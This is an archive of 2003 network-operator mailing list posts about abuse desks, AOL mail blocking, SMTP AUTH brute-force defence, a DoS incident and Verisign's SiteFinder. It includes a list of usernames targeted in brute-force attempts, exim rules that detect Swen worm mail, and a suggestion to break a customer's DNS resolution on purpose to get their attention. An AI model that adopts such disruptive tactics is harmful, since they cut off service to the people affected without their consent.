- Original Message - From: Matthew S. Hallacy [EMAIL PROTECTED] To: Matt [EMAIL PROTECTED]; [EMAIL PROTECTED] Sent: Sunday, October 12, 2003 3:18 AM Subject: Re: Abuse Departments Most places will take care of abuse issues if they get to the right person, but some places simply won't wake up their network admin at 11:00 on a saturday night because some script kiddie's DSL is getting attacked by another script kiddie on IRC. Watch yourself poptix - you don't have such a squeaky clean past either. Point is this. If your network/servers are being used in an attack against someone else, you can be held responsible if you do not act in a timely manner. This script kiddie's DSL is actually a shared setup with several servers on the end of it and a firewall. What happens to it also affects me and my customers. When my customers go down, I get complaints. Now, if your network was attacking mine from a comprimised box, and you failed to act in a timely fashion, regardless if its a DSL or a T1 or a dialup for that matter, I'd either sue you myself for allowing the attack to continue, or give my customers your info and let THEM sue you for it.
Re: Abuse Departments
- Original Message - From: Bryan Heitman [EMAIL PROTECTED] To: [EMAIL PROTECTED] Sent: Sunday, October 12, 2003 11:33 AM Subject: Re: Abuse Departments Would you perhaps have more underlying problems if a script kiddie on a dialup can attack you in such a way to impact your service? Sorry, I meant a DSL, T1, dialup, whatever as the one being attacked. I just woke up, so cut me some slack here.
AOL mail server problems?
Hello everyone, I've noticed some weird things going on with AOL's smtp servers today - 2003-10-12 12:37:48 1A8k8X-0002OC-0c Remote host mailin-04.mx.aol.com [64.12.138.89] closed connection in response to initial connection 2003-10-12 12:37:55 1A8k8X-0002OC-0c Remote host mailin-04.mx.aol.com [64.12.136.153] closed connection in response to initial connection 2003-10-12 12:38:35 1A8k8X-0002OC-0c Remote host mailin-04.mx.aol.com [152.163.224.122] closed connection in response to initial connection Have about 40 of these in my mail logs going to different AOL smtp servers. Trying to connect by hand using telnet results in the mail servers closing the connection right away without giving a reason. I did however, out of about 20 tests, got through once and actually got the server's welcome message. Any ideas? -- Brian Bruns The Summit Open Source Development Group Open Solutions For A Closed World / Anti-Spam Resources http://www.sosdg.org ICQ: 8077511
Re: AOL mail server problems?
- Original Message - From: [EMAIL PROTECTED] To: Brian Bruns [EMAIL PROTECTED] Cc: [EMAIL PROTECTED] Sent: Sunday, October 12, 2003 2:16 PM Subject: Re: AOL mail server problems? They're probably blocking you. Have you gotten many scomp complaints recently?...perhaps a big backlog of them that you/your abuse people haven't dealt with? Last time I dealt with AOL blocking us, that was the cause, and the result was mixed. Sometimes we'd get the connection closed as above, sometimes a 550 message telling us we were blocked. Well, just to be absolutely sure, I checked the forwardings for abuse@, postmaster@, and a few others, all of which go to [EMAIL PROTECTED] I haven't seen any mail from AOL support/abuse/tech/whatever to us (nor has any of the other admins). We are a very small and close nit group with very few actual users - stuff like spam, viruses, and mailbombs get noticed really quickly (we all have pagers/cell phones which get a message whenever the system detects something unusual going on). What I was discussing with someone offlist was that AOL has apparently been threatning to disallow connections from dynamic IPs for a while now, and they apparently are starting to follow through with it. Although my IP looks like a dynamic IP, its a static IP out of a block of /29 (do a whois on 68.78.10.168 and you'll see it belongs to Nathan Drook, one of the people here). This is one of those reasons why I hate DUL lists with a passion. Its not foolproof, and alot of smaller sites get nailed in this mess. Of course, AOL offers up no way of correcting these listings on their site, the postmaster site of theirs, or via the mail daemon itself. Whats very interesting is that the mail finally does go through after rotating a few dozen times between different MX hosts. Whats even more interesting is that when the mail did go through, it went through to an IP which blocked it several times before. I have no idea if its just because not all of their servers are properly updated yet or not. Who knows. *shrug* -- Brian Bruns The Summit Open Source Development Group Open Solutions For A Closed World / Anti-Spam Resources http://www.sosdg.org ICQ: 8077511
Re: AOL mail server problems?
- Original Message - From: Suresh Ramasubramanian [EMAIL PROTECTED] To: Brian Bruns [EMAIL PROTECTED] Cc: [EMAIL PROTECTED]; [EMAIL PROTECTED] Sent: Sunday, October 12, 2003 2:39 PM Subject: Re: AOL mail server problems? When it comes to a choice between letting in the ~ 1% of small businesses and linux geeks on dialup + dynamic DNS, and letting in all the direct to MX spam and virus mail that is ~ 99% of the traffic from dynamic IP space, I'll surely take the choice of blocking dynamic IPs, thank you very much. Just checked their DUL lookup. My range is not on their list. I guess I'll call them a little later and ask whats up. -- Brian Bruns The Summit Open Source Development Group Open Solutions For A Closed World / Anti-Spam Resources http://www.sosdg.org ICQ: 8077511
Re: AOL mail server problems?
- Original Message - From: Joshua Levitsky To: Brian Bruns Cc: [EMAIL PROTECTED] ; [EMAIL PROTECTED] ; Suresh Ramasubramanian Sent: Sunday, October 12, 2003 3:10 PM Subject: Re: AOL mail server problems? What is the PTR record for your mail server? If you don't have one or if it reads like a residential one then I've heard of that getting blocked. Also be advised you can contact [EMAIL PROTECTED] or AOL Postmaster HelpDesk at 1-703-265-4670 or 1- 888-212-5537. Before you email or call you should try this to verify that you have a PTR and that it doesn't read like a residential. (For example dsl081-214-123.nyc2.dsl.speakeasy.net. ) Ah yeah, we have an ameritech PTR right now (working on that problem as well). I guess I'll have one of my guys call ameritech and complain about the PTR. -- Brian Bruns The Summit Open Source Development Group Open Solutions For A Closed World / Anti-Spam Resources http://www.sosdg.org ICQ: 8077511
Re: New mail blocks result of Ralsky's latest attacks?
Title: Message Tis one of the reasons why I've disabled SMTP AUTH on all of my servers for now. I've known about this for a few weeks now. Its not surprising. Most of the servers cracked are Exchange servers (probably thanks to weak passwords), but I still don't feel like taking a chance. Exchage does a horrible job of logging, which is why they are probably being targeted. Most real SMTP servers (sendmail, exim, postfix, qmail) log failed attempts in the maillog or via PAM (if they use it). --Brian BrunsThe Summit Open Source Development GroupOpen Solutions For A Closed World / Anti-Spam Resourceshttp://www.2mbit.comICQ: 8077511 - Original Message - From: Bob German To: [EMAIL PROTECTED] Sent: Friday, October 10, 2003 10:59 AM Subject: New mail blocks result of Ralsky's latest attacks? A colleague informed me this morning that Alan Ralsky is doing widespread bruteforce attacks on SMTP AUTH, and they are succeeding, mainly because it's quick, painless (for him), and servers and IDS signatures don't generally offer protection against them. Could this be why everyone's locking up their mail servers all of a sudden? Does anyone know of a way to stop them? Bob
Re: New mail blocks result of Ralsky's latest attacks?
Title: Message Just FYI, I am putting together another paper as we speak on how to secure your mail servers against this type of attack. Should be online by this afternoon at the latest. Ok, this is where I need to ask for your guys help as well. If anyone here has experience with postfix or qmail, please let me know if you know ways of securing these mail servers from these kinds of attacks. I'm familiar with sendmail, exim, and exchange. --Brian BrunsThe Summit Open Source Development GroupOpen Solutions For A Closed World / Anti-Spam Resourceshttp://www.2mbit.comICQ: 8077511 - Original Message - From: Brian Bruns To: Bob German ; [EMAIL PROTECTED] Sent: Friday, October 10, 2003 11:12 AM Subject: Re: New mail blocks result of Ralsky's latest attacks? Tis one of the reasons why I've disabled SMTP AUTH on all of my servers for now. I've known about this for a few weeks now. Its not surprising. Most of the servers cracked are Exchange servers (probably thanks to weak passwords), but I still don't feel like taking a chance. Exchage does a horrible job of logging, which is why they are probably being targeted. Most real SMTP servers (sendmail, exim, postfix, qmail) log failed attempts in the maillog or via PAM (if they use it). --Brian BrunsThe Summit Open Source Development GroupOpen Solutions For A Closed World / Anti-Spam Resourceshttp://www.2mbit.comICQ: 8077511 - Original Message - From: Bob German To: [EMAIL PROTECTED] Sent: Friday, October 10, 2003 10:59 AM Subject: New mail blocks result of Ralsky's latest attacks? A colleague informed me this morning that Alan Ralsky is doing widespread bruteforce attacks on SMTP AUTH, and they are succeeding, mainly because it's quick, painless (for him), and servers and IDS signatures don't generally offer protection against them. Could this be why everyone's locking up their mail servers all of a sudden? Does anyone know of a way to stop them? Bob
Fw: New mail blocks result of Ralsky's latest attacks?
MessageThis is something I sent to someone offlist. I've strpped out his name, etc. -- Brian Bruns The Summit Open Source Development Group Open Solutions For A Closed World / Anti-Spam Resources http://www.2mbit.com ICQ: 8077511 - Original Message - From: Brian Bruns To: X Cc: [EMAIL PROTECTED] Sent: Friday, October 10, 2003 11:35 AM Subject: Re: New mail blocks result of Ralsky's latest attacks? Hey XXX, There are a few ways to lock down an Exchange server. Luckily, I used to be an Exchange admin two years ago, so let me quickly dig up my notebook... Ok, first, make sure on your exchange server you have Guest disabled. According to reports, the following usernames are being tested and cracked: abc, web, admin, www, administrator, data, server, backup, master, test, root, webmaster. Basically, if you have any of these accounts active, please make sure they have a strong password on them. Please be careful though when changing them - you'll have to make sure that all services which depend on the account also are updated with the new password. Second, if you don't use SMTP auth, simply disable it. Open the SMTP virtual server properties under Exchange Server Manager, select the Access tab, click Relay in the Relay restrictions group. Clear the check off of Allow all computers which successfully authenticate, regardless of the list above You should be in good shape then. On a side note (and I do recommend this to my customers), if you want added security, yeah, you are going to want to use a UNIX/Linux box in front of the exchange server and then relay mail to it. That way, you are less likely to fall victim to Exchange exploits as well. Its not too hard to setup, but takes time. -- Brian Bruns The Summit Open Source Development Group Open Solutions For A Closed World / Anti-Spam Resources http://www.2mbit.com ICQ: 8077511
Re: Verisign's public opinion play
Well, I donno about anyone else, but I absolutely suck on the PR end of things. Now, I *am* good at writing documentation for end users (I used to work helldesk). So, my question is, is there any place on the web where we can go, see whats been written up so far, find out what still needs to be written, and get people to fill in the blanks? I know personally I would love to put out a paper, but I have no idea where to begin. -- Brian Bruns The Summit Open Source Development Group Open Solutions For A Closed World / Anti-Spam Resources http://www.2mbit.com ICQ: 8077511 - Original Message - From: Owen DeLong [EMAIL PROTECTED] To: Brian Bruns [EMAIL PROTECTED]; [EMAIL PROTECTED] Sent: Tuesday, October 07, 2003 2:00 AM Subject: Re: Verisign's public opinion play I wish it were lack of clue. This is something far more evil than lack of clue, and, the bottom line is that these guys are much better at PR than most of us. Since they can't win on engineering, because they are wrong, they are trying to make it a PR battle instead. They are having some success. We _MUST_ fight this as a PR battle. We _MUST_ write courteous, prompt, and, factual replies to these publications. The more people who do that, the better our side will look. We must point out where Verisign is lying, and, we must concede where they are not. We must clarify where their technically accurate statements lead to wildly inaccurate perceptions. Owen --On Monday, October 6, 2003 23:15 -0400 Brian Bruns [EMAIL PROTECTED] wrote: Wish someone who was good with the clue-axe would take a swing at these dolts. We all know they are crying babies because their new method of profit was shut down. Now, the interesting question will be, how can we prevent them from adding sitefinder again? -- Brian Bruns The Summit Open Source Development Group Open Solutions For A Closed World / Anti-Spam Resources http://www.2mbit.com ICQ: 8077511 - Original Message - From: Kee Hinckley [EMAIL PROTECTED] To: [EMAIL PROTECTED] Sent: Monday, October 06, 2003 11:12 PM Subject: Verisign's public opinion play Take your blood pressure medicine before reading this one. http://news.com.com/2010-1071-5086769.html Apparently our objections stem from our lingering resentment over the commercial use of the internet. In case you're wondering who the author is, since neither the bio on the page or Verisign's site is helpful. Mark McLaughlin is a former lawyer who moved into Marketing and Biz Development (Caere, Gemplus, Signio and then Verisign payments). -- Kee Hinckley http://www.messagefire.com/ Next Generation Spam Defense http://commons.somewhere.com/buzz/ Writings on Technology and Society I'm not sure which upsets me more: that people are so unwilling to accept responsibility for their own actions, or that they are so eager to regulate everyone else's.
Re: an example individual response to Verisign spin
Ok, I've been working on this for a while, its still v1.1 of the document, so it needs some more work including references and stuff like that. I wrote it in AbiWord, but it didn't translate to HTML so well, will work on getting it better later on tonight. Comments are welcome. http://www.sosdg.org/papers/VSGNWCD.html I tried to write it as simple as I could in the hopes it might help end users understand the issues created by the SiteFinder 'service'. -- Brian Bruns The Summit Open Source Development Group Open Solutions For A Closed World / Anti-Spam Resources http://www.2mbit.com ICQ: 8077511 - Original Message - From: [EMAIL PROTECTED] To: [EMAIL PROTECTED] Sent: Tuesday, October 07, 2003 2:02 PM Subject: fyi: an example individual response to Verisign spin Subject: [IP] Yesterdays WJS article on Versign http://www.interesting-people.org/archives/interesting-people/200310/msg00057.h tml --- Forwarded Message Date: Tue, 07 Oct 2003 04:45:48 -0400 To: [EMAIL PROTECTED] From: Dave Farber [EMAIL PROTECTED] Subject: [IP] Yesterdays WJS article on Versign Date: Mon, 06 Oct 2003 15:17:34 -0700 From: Dave Crocker [EMAIL PROTECTED] Subject: Today's WJS article on Versign To: [EMAIL PROTECTED] Cc: Nick Wingfield [EMAIL PROTECTED], Dave Farber [EMAIL PROTECTED] Re: Nick Wingfield's article http://online.wsj.com/article/0,,SB106519977252395300,00.html?mod=dartTech tod ay Hello, VeriSign's critics, of course, see it differently, accusing VeriSign of undermining the collectivist culture of the Internet, through which engineers hash out key changes to the network through standards groups. Unlike the Web and e-mail, which have become thoroughly commercialized through advertising, the low-level Internet routing software that VeriSign altered with its new service has remained relatively insulated from efforts to make a profit. ... Although notably better than most of the articles on this topic, Mr. Wingfield still managed to buy Verisign's spin, both its erroneous facts and its erroneous perspective. First of all, the service that Verisign runs has been for profit for as long as it has run it. That's roughly ten years. In addition the problems caused by Verisign were not just in the eyes of technologists. Second of all, consider the service they suddenly changed in terms of its equivalent in the world of telephone. Imagine dialing a non-existent number or asking 411 for the number of a non-existent entry, and not being told that there is no listing. Instead, you are given a phone number that feeds you advertising. Would you view this as a valuable navigational aid for users who might otherwise hit an online dead-end? Probably not. The problem, here, is not a culture-clash between commercial ventures and naive technologists. Verisign contracted to provide a critical infrastructure service that maps domain names to Internet addresses. The only clash is between responsible and irresponsible approaches to providing that service. If Verisign cannot operate it at a profit, without breaking it, there are others quite willing and able to do the job. d/ -- Dave Crocker dcrocker-at-brandenburg-dot-com Brandenburg InternetWorking www.brandenburg.com Sunnyvale, CA USA tel:+1.408.246.8253 -- Archives at: http://www.interesting-people.org/archives/interesting-people/ --- End of Forwarded Message
DoS Attacks
Oh boy, what a fun night this was. After a 4 or so hours downtime, my servers are back up and running. Heres the gorey details. At about 7pm EST, we began having unusual issues with our network, the router, and several machines on the network. For the first part of the attack, we were held down for a good 30-60 minutes. Took us a while to figure out which one of our machines was being targeted. Turns out to be our NAT firewall box. We tried several things to drop the attack, but it still kept coming in strong (mind you, we don't have very much bandwidth, but we can usually ride out DoS attacks pretty well - this was an exception) Then suddenly, out of the blue it dropped. Outside connectivity was restored and things were back to normal. 20 minutes later, the relentless attack began again. This time, we were ready and waiting with tcpdump and several other handcrafted tools we use for this type of thing. The attack was coming from a single source machine, unspoofed (ballsy if you ask me), 128.186.11.215. Packets were UDP, random from 2100-2299 source and 2400-2699 dest. So, now for the fun part. Being offsite, I wasn't the one to place the calls, but my admin on site started with FSU's abuse desk. No help whatsoever. Claimed that because the abuse desk was gone, they had no authority to deal with the problem. Frustrated, annoyed, and pissed off, he tried again, and got hung up on twice. Nice people eh? Our next call was a bit later (at this point, we were very unhappy and ready to start raising hell with anyone we could find) - this time, to their upstream Qwest. After dealing with the operator, they finally sent him to one of the NOCs. Unfortunately, they sent him to the wrong NOC and not the Qwest MD NOC. Luckily, we got someone with a clue - a nice guy by the name of Richard Stein who tried to help us, but found that the other NOC was unresponsive and couldn't do anything himself to solve the problem. After hanging up with Qwest, we got a call back from FSU. After a good 20 minutes or so of talking with the net admin from FSU, things were finally set in motion. After another good 10 minutes or so, connectivity was restored and everything was back to normal. According to my guy, they yanked the whole subnet at FSU. Problem solved. So here I am, asking if anyone here has any advice on dealing with these issues in the future? Its painfully apparent noone takes these situations seriously enough. What should we do when we are put in a position like this? Just sit back and hope it goes away itself? Also, any ideas on how to deal with these attacks on lower bandwidth connections? Right now, 2mbit.com / sosdg.org is sitting on a 1.5/256 business DSL line. I really can't afford to be buying T1s or T3s just to hold up to attacks like this. As always, thanks. -- Brian Bruns The Summit Open Source Development Group Open Solutions For A Closed World / Anti-Spam Resources http://www.2mbit.com ICQ: 8077511
Re: DoS Attacks
- Original Message - From: Mark Radabaugh [EMAIL PROTECTED] To: [EMAIL PROTECTED] Sent: Tuesday, October 07, 2003 11:56 PM Subject: Re: DoS Attacks I think I would follow two avenues next time - the direct approach with FSU (or wherever the traffic is coming from) as well as with your DSL provider. Your upstream should be able to assist in at least keeping the traffic off of your dedicated line. Whether your DSL provider has the resources to sink the traffic may be another matter -- but they are at least in a position to help you and (since you are paying them) have an interest in dealing with you. I hate to say this, but Ameritech/SBC is utterly useless in matters like this. I mean, at one point their redback was being nailed, and they didn't seem to care one bit. After 5pm, everyone with a clue seems to leave, and we are left with useless low level help desk techs. Our DSL service isn't bad - in fact it rarely goes down. The problem is that when we need their help with something out of our league, they are completely useless. Anyone know of a contact number for SBC/Ameritech that would be useful in a case like this? -- Brian Bruns The Summit Open Source Development Group Open Solutions For A Closed World / Anti-Spam Resources http://www.2mbit.com ICQ: 8077511
Re: Verisign's public opinion play
Wish someone who was good with the clue-axe would take a swing at these dolts. We all know they are crying babies because their new method of profit was shut down. Now, the interesting question will be, how can we prevent them from adding sitefinder again? -- Brian Bruns The Summit Open Source Development Group Open Solutions For A Closed World / Anti-Spam Resources http://www.2mbit.com ICQ: 8077511 - Original Message - From: Kee Hinckley [EMAIL PROTECTED] To: [EMAIL PROTECTED] Sent: Monday, October 06, 2003 11:12 PM Subject: Verisign's public opinion play Take your blood pressure medicine before reading this one. http://news.com.com/2010-1071-5086769.html Apparently our objections stem from our lingering resentment over the commercial use of the internet. In case you're wondering who the author is, since neither the bio on the page or Verisign's site is helpful. Mark McLaughlin is a former lawyer who moved into Marketing and Biz Development (Caere, Gemplus, Signio and then Verisign payments). -- Kee Hinckley http://www.messagefire.com/ Next Generation Spam Defense http://commons.somewhere.com/buzz/ Writings on Technology and Society I'm not sure which upsets me more: that people are so unwilling to accept responsibility for their own actions, or that they are so eager to regulate everyone else's.
Re: [MEDIA] McLaughlin Defends Site Finder As 'Innovation'
You know who/what this sounds like? Microsoft. When smacked down about IE integration and WMP integration, they screamed bloody murder and claimed freedom of innovation. Exactly what NetSol/Verisign is doing. Maybe they have the same PR firm? -- Brian Bruns The Summit Open Source Development Group Open Solutions For A Closed World / Anti-Spam Resources http://www.2mbit.com ICQ: 8077511 - Original Message - From: wayne [EMAIL PROTECTED] To: [EMAIL PROTECTED] Sent: Monday, October 06, 2003 11:14 PM Subject: [MEDIA] McLaughlin Defends Site Finder As 'Innovation' As seen on /. http://news.com.com/2010-1071-5086769.html Mark McLaughlin, senior VP of Verislime, has an editorial on news.com claiming that ICANN is stifling innovation and forcing the internet to stagnate. The PR machine is out in force and painting anyone who disagrees with them as anti-capitalistic loonies. -wayne
Re: Trying to subscribe to Sitefinder list
I got on OK, but I used the web based confirmation method. Maybe their mail server got flooded? -- Brian Bruns The Summit Open Source Development Group Open Solutions For A Closed World / Anti-Spam Resources http://www.2mbit.com ICQ: 8077511 - Original Message - From: Howard C. Berkowitz [EMAIL PROTECTED] To: [EMAIL PROTECTED] Sent: Tuesday, October 07, 2003 1:41 AM Subject: Trying to subscribe to Sitefinder list Well, I've been trying. I got a double opt-in that gave me a deadline to respond of 5AM Wednesday. I replied. No confirmation. Tried to post (crossposted to NANOG). Got error message telling me I was not yet on the list. Of course, with the apparent assumption the Internet is the Web, the first directions were to use a browser. Another option was to respond with a token in the message, a common enough procedure for mailing lists. I didn't read the fine print well enough. The first time, I discovered that the token had confirm no in it. Removed no. Reread instructions. Just removing wasn't enough. Had to edit it to confirm yes. Is there something wrong with the user friendliness of this picture, assuming that people actually use something other than a web browser, shocking as that might be for a m-a-i-l-i-n-g l-i-s-t? g.
Re: Removal of wildcard A records from .com and .net zones
Heres an interesting question Matt, maybe you can provide me with a worthwhile answer. Last night, I finally got around to registering a .org domain for my use. It took only 20 minutes from the time which I registered it, gave it my DNS servers, and paid for it, to when it was resolveable everywhere in the world. Thats *20* minutes. Why does it take NetSol 24/48/72 hours to do the same thing? -- Brian Bruns The Summit Open Source Development Group Open Solutions For A Closed World / Anti-Spam Resources http://www.2mbit.com ICQ: 8077511 - Original Message - From: Matt Larson [EMAIL PROTECTED] To: [EMAIL PROTECTED] Sent: Friday, October 03, 2003 5:50 PM Subject: Removal of wildcard A records from .com and .net zones VeriSign was directed by ICANN to suspend the Site Finder service by 0100 UTC on Sunday, October 5. We requested an extension from ICANN to give more notice to the community but were denied. We will be removing the wildcard A records from the .com and .net zones beginning at 2300 UTC on Saturday, October 4. The former behavior for these zones (returning Name Error/RCODE=3 in response to queries for nonexistent domain names) will be in place by 0100 UTC on Sunday, October. Matt -- Matt Larson [EMAIL PROTECTED] VeriSign Naming and Directory Services
Re: Removal of wildcard A records from .com and .net zones
- Original Message - From: Matt Larson [EMAIL PROTECTED] To: [EMAIL PROTECTED] Sent: Friday, October 03, 2003 5:50 PM Subject: Removal of wildcard A records from .com and .net zones VeriSign was directed by ICANN to suspend the Site Finder service by 0100 UTC on Sunday, October 5. We requested an extension from ICANN to give more notice to the community but were denied. We will be removing the wildcard A records from the .com and .net zones beginning at 2300 UTC on Saturday, October 4. The former behavior for these zones (returning Name Error/RCODE=3 in response to queries for nonexistent domain names) will be in place by 0100 UTC on Sunday, October. Is this supposed to make us feel sorry for you? You broke something very important on the Internet, without asking, without giving any prior notice, and now you expect to get time to give notice that its going away? I think I speak for most people when I say Hell no! The community has wanted this horrible POS hack to go away. We don't want this one day more then necessary. Tell your superiors to find another way to make a quick buck. The Internet and the DNS system is not yours to play with at a whim. *holds up a glass of vodka* Here's to the good guys winning another battle. -- Brian Bruns The Summit Open Source Development Group Open Solutions For A Closed World / Anti-Spam Resources http://www.2mbit.com ICQ: 8077511
Re: Annoying dynamic DNS updates (was Re: someone from attbi please contact me ...)
Paul, How about just configuring your BIND to return errors when his queries against your server? He has got to be using you as either a primary or secondary name server. That would make everything on that machine suddenly come to a grinding halt as nothing would resolve anymore. I used to do that to customers who didn't turn off dynamic dns updates. It got their attention quick. -- Brian Bruns The Summit Open Source Development Group Open Solutions For A Closed World / Anti-Spam Resources http://www.2mbit.com ICQ: 8077511 - Original Message - From: Paul Vixie [EMAIL PROTECTED] To: [EMAIL PROTECTED] Sent: Sunday, September 28, 2003 12:09 PM Subject: Re: Annoying dynamic DNS updates (was Re: someone from attbi please contact me ...) Back in beta days, the official explanation given was that the DNS updating was a value add and that it would never be disabled as a default as a courtesy to corporate customers. Furthermore, MSFT folks have repeatedly said that the workaround is to simply configure your nameserver to silently ignore the error logs. Well, I'm not going to disable that logging since it has been useful in signalling real attacks in the past. But the thing Microsoft needed to do with this was ensure that whoever is pirating my domain names on their home PCs get error message popups telling them to go to MSN and buy a real domain name. That is, they could be making money here rather than just giving my syslogd a headache. If MSFT would behave more greedily then their customer PCs would be contacting them rather than me, right? -- Paul Vixie
Re: what happened to ARIN tonight ?
works fine for me. -- Brian Bruns The Summit Open Source Development Group Open Solutions For A Closed World / Anti-Spam Resources http://www.2mbit.com ICQ: 8077511 - Original Message - From: Mike Tancsa [EMAIL PROTECTED] To: [EMAIL PROTECTED] Sent: Sunday, September 28, 2003 9:29 PM Subject: what happened to ARIN tonight ? The Oregon route server seems to indicate they are off the air. Not that I care to look at fee schedules tonight, but the whois server for in-addr.arpa is toast as a result :-( ---Mike BGP routing table entry for 192.149.252.0/24, version 1277910 Paths: (57 available, best #48, table Default-IP-Routing-Table) Flag: 0x8A0 Not advertised to any peer 15290 7018 701 7046 (history entry) 216.191.65.126 from 216.191.65.126 (216.191.65.126) Origin IGP, localpref 100, external Dampinfo: penalty 1407, flapped 2 times in 00:02:01 6939 7911 701 7046 (history entry) 216.218.252.152 from 216.218.252.152 (216.218.252.152) Origin IGP, localpref 100, external Dampinfo: penalty 1408, flapped 2 times in 00:01:42 15290 7018 701 7046 (history entry) 216.191.65.118 from 216.191.65.118 (216.191.65.118) Origin IGP, localpref 100, external Dampinfo: penalty 1407, flapped 2 times in 00:02:00 6395 1239 701 7046 (history entry) 216.140.2.59 from 216.140.2.59 (216.140.2.59) Origin IGP, metric 5657, localpref 100, external Community: 6395:1 6395:1007 Dampinfo: penalty 2796, flapped 4 times in 00:01:46 Mike Tancsa,tel +1 519 651 3400 Sentex Communications, [EMAIL PROTECTED] Providing Internet since 1994www.sentex.net Cambridge, Ontario Canada www.sentex.net/mike
Re: AOL Proxy Servers not connecting via https
Last time I checked, SSL connections do not get proxied through the AOL caching servers. They go directly from the client. 172.151.135.3 is not an AOL proxy server, it is an end user IP address that a AOL user gets when they dial in. cache-rf03.proxy.aol.com is an AOL proxy. -- Brian Bruns The Summit Open Source Development Group Open Solutions For A Closed World / Anti-Spam Resources http://www.2mbit.com ICQ: 8077511 - Original Message - From: mike harrison [EMAIL PROTECTED] To: [EMAIL PROTECTED] Cc: [EMAIL PROTECTED]; [EMAIL PROTECTED] Sent: Thursday, September 25, 2003 2:24 PM Subject: AOL Proxy Servers not connecting via https I'm looking for a clueful person either inside of AOL's NetOps or someone else that can help us. Problem; Using AOL Dial-Up, through AOL Browser or MSIE users can connect to our web servers and our clients web servers via normal http with no problem. If they connect to a secure site (https://) they get 'page can not be displayed' and other errors. We have this issue with Linux/Apache as well as MSIE servers. Sniffing such connections, we get one of two scenerios: 1. A connection is opened from an AOL proxy server (172.151.135.3 for example) yet no data is transmitted. 2. A connection is opened from an AOL proxy server. what looks like a request is sent (580 bytes) and some response is sent back (5k bytes) Yet the clients browser never gets a website.. The webserver logs an 'error 408' from the request, Which is a request timeout. 2 test websites to try from AOL: https://www.krystal.net MS https://www.onrope1.com Linux/Apache Clue Bat's welcome. Thank You --Mike--
Re: AOL Proxy Servers not connecting via https - resolved
This might be helpful to people setting up ACLs and the like: http://webmaster.info.aol.com/proxyinfo.html -- Brian Bruns The Summit Open Source Development Group Open Solutions For A Closed World / Anti-Spam Resources http://www.2mbit.com ICQ: 8077511 - Original Message - From: mike harrison [EMAIL PROTECTED] To: [EMAIL PROTECTED] Sent: Thursday, September 25, 2003 5:10 PM Subject: Re: AOL Proxy Servers not connecting via https - resolved A Clue Bat was gently swung by a friendly and clueful (semi-anonymous) AOL NetOps guys who contacted me from my post on Nanog. Thanks Nanog, and this sounds strange from me, but Thank's AOL. :) And yes, it should have been obvious on my part.. a router was configured with a 172.0.0.0/8 netmask. ..there is what we call an RFC1918 issue. AOL was given some IPs in the 172.16.x.x range by ARIN. These are valid routable IPs, and we use them as IPs for the AOL user's machines (kinda like DHCP). The problem is that some people block all of 172.x.x.x thinking it's only for non-routable IPs when it's only half that range that is non-routable. (172.16.0.0/20 is the routable part). That appears to be the case with this one. We've asked ARIN for a different range, and they told us to go away, so we are stuck with this issue. If you can ask someone who does firewall and/or router ACLs in front of that website, they should be able to fix the issue.
Re: When is Verisign's registry contract up for renewal
- Original Message - From: Robert Blayzor [EMAIL PROTECTED] To: Sean Donelan [EMAIL PROTECTED]; [EMAIL PROTECTED] Sent: Saturday, September 20, 2003 5:01 PM Subject: Re: When is Verisign's registry contract up for renewal Quiet honestly I'd like to see all of the GTLD servers given to neutral companies, ones that ARE not registrars. Verisign is already engaging in a lot of unfair business practices because they hold the GTLD servers for net/com. The wildcard SNAFU is just one of their tactics to patch the financial hole since people have been switching registrars in droves. I've had long discussions with my admin team at the SOSDG on what would be the best way to prevent stuff like this from happening in the future. We came to the following conclusion: * Root servers or any critical DNS servers should not be in the control of companies. It should be handed over to Non-profit/not-for-profit orgs who will not be tempted to do the things Verisign has done.We feel completely comfortable with the root servers being in control of a group like the ISC or even govt. agencies like NASA. There is too much at stake here for people to be playing games with TLDs, especially ones as important as .com and .net. -- Brian Bruns The Summit Open Source Development Group Open Solutions For A Closed World / Anti-Spam Resources http://www.2mbit.com ICQ: 8077511
Re: Nothing like viruses with bugs in them (Swen)
These are exim filters which catch the damn thing when the antivirus software misses it. Hopefully it might be useful. It was taken from http://pkierski.republika.pl/filtry.shtml. # Swen # if $h_content-type matches multipart/mixed; boundary=.[a-z]{6} and $message_body matches September 200[23], Cumulative Patch then logfile $home/filter.log 0644 logwrite $tod_log - filter: *** Swen.1 *** - sender: $sender_address - subj$ seen finish endif # Swen # if $h_content-type contains multipart/alternative; and $h_content-type matches boundary=.[a-z]{6} and $message_body matches iframe src=3D.cid:.*height=3D0.* width=3D0.*/iframe then logfile $home/filter.log 0644 logwrite $tod_log - filter: *** Swen.2 *** - sender: $sender_address - subj$ seen finish endif -- Brian Bruns The Summit Open Source Development Group Open Solutions For A Closed World / Anti-Spam Resources http://www.2mbit.com ICQ: 8077511 - Original Message - From: Mark Radabaugh [EMAIL PROTECTED] To: [EMAIL PROTECTED] Sent: Friday, September 19, 2003 12:03 PM Subject: Nothing like viruses with bugs in them (Swen) Seems like this virus/worm has a bug where it will occasionally send out 1 byte attachments rather than the correct worm payload. Since the virus is not truly attached it tends to pass through e-mail virus scanners. It's causing a fair amount of end user confusion today -- lots of 'why is your/my virus scanner not working?' questions. Mark Radabaugh Amplex (419) 720-3635
Re: Worst design decisions?
*glares* Sometimes, especially on the Windows platform, its hard trying to find an email program which does what you need it to. I've tried Eudora, Netscape/Mozilla, and a few others I forget what they are named. All feel clutsy and incomplete. Outlook and its little friend Outlook Express at least work pretty consistantly. I've not had serious problems using it full time. Now, before everyone starts calling me a Microsoft supporter - I hate microsoft just as much as any other sysadmin/netadmin. But sometimes (abeit rarely), microsoft does something halfway decent. Now, if I could get K-Mail forWindows, I'd be in good shape. -- Brian Bruns The Summit Open Source Development Group Open Solutions For A Closed World / Anti-Spam Resources http://www.2mbit.com ICQ: 8077511 - Original Message - From: David Lesher [EMAIL PROTECTED] To: nanog list [EMAIL PROTECTED] Sent: Thursday, September 18, 2003 10:01 AM Subject: Re: Worst design decisions? Sorry, I missed the hands-down winner in my initial thinking, since it's not in my arena [hardware].. The envelope please.. Micro$loth Lookout {applause} Starting with Let's invent top-posting and moving to its virus-spreading abilities; Lookout has never met a standard, either hard [written/RFC] or not [consensus] that it could not wound/kill. Further, it damages the thinking of its users almost as well as drug dealers wares -- be that crack or this week's over-hyped anti-depress^H^H^H mood-fixer. It's the Newspeak of the current era. -- A host is a host from coast to [EMAIL PROTECTED] no one will talk to a host that's close[v].(301) 56-LINUX Unless the host (that isn't close).pob 1433 is busy, hung or dead20915-1433
Re: Worst design decisions?
